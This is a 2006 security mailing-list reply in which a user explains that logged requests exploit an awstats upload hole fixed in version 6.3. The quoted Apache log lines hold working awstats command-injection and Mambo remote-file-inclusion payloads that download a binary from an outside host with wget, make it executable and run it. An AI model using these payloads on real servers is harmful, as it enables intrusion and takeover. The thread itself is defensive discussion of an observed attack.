[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [suse-security] Strange Apache Log entries

To: suse-security@xxxxxxxx
Subject: Re: [suse-security] Strange Apache Log entries
From: "Markus Gerke" <gerke@xxxxxxxxxxxxxxxxxxx>
Date: Thu, 5 Jan 2006 21:41:00 +0100 (CET)
Delivered-to: mailing list suse-security@xxxxxxxx
Importance: Normal
List-help: <mailto:suse-security-help@suse.com>
List-post: <mailto:suse-security@suse.com>
List-subscribe: <mailto:suse-security-subscribe@suse.com>
List-unsubscribe: <mailto:suse-security-unsubscribe-suse=archive.cert.uni-stuttgart.de@suse.com>
Mailing-list: contact suse-security-help@xxxxxxxx; run by ezmlm
User-agent: SquirrelMail/1.4.5

Hi,
up to version 6.2 there was a security hole in awstats which allowed an
attacker to upload files and run them. I know it, because my server was
successfully attacked last year ;-)

With 6.3 this issue was fixed.

Regards,
Markus

PS: I use .htaccess to restrict access to the statistics. That's an
further security improvement.


>
> Hi all. Does anyone know what all this lot is please?
>
> 62.171.219.110 - - [05/Jan/2006:19:54:41 +0000] "GET
> /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
HTTP/1.1" 404 328
> 62.171.219.110 - - [05/Jan/2006:19:54:43 +0000] "GET
> /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
HTTP/1.1" 404 328
> 62.171.219.110 - - [05/Jan/2006:19:54:44 +0000] "GET
> /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
HTTP/1.1" 404 336
> 62.171.219.110 - - [05/Jan/2006:19:54:45 +0000] "GET
> /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|
HTTP/1.1" 404 320
> 62.171.219.110 - - [05/Jan/2006:19:54:46 +0000] "GET
> /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|
HTTP/1.1" 404 319
> 62.171.219.110 - - [05/Jan/2006:19:54:47 +0000] "GET
> /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|
HTTP/1.1" 404 326
> 62.171.219.110 - - [05/Jan/2006:19:54:48 +0000] "GET
> /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|
HTTP/1.1" 404 324
> 62.171.219.110 - - [05/Jan/2006:19:54:49 +0000] "GET
> /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|
HTTP/1.1" 404 330
>
> Regards
>
> Keith
>
> --
> Check the headers for your unsubscription address
> For additional commands, e-mail: suse-security-help@xxxxxxxx
> Security-related bug reports go to security@xxxxxxx, not here
>
>





-- 
Check the headers for your unsubscription address
For additional commands, e-mail: suse-security-help@xxxxxxxx
Security-related bug reports go to security@xxxxxxx, not here

Prev by Date: Re: [suse-security] Strange Apache Log entries
Next by Date: Re: [suse-security] Strange Apache Log entries
Previous by thread: Re: [suse-security] Strange Apache Log entries
Next by thread: [suse-security] User private groups?
Index(es):
- Date
- Thread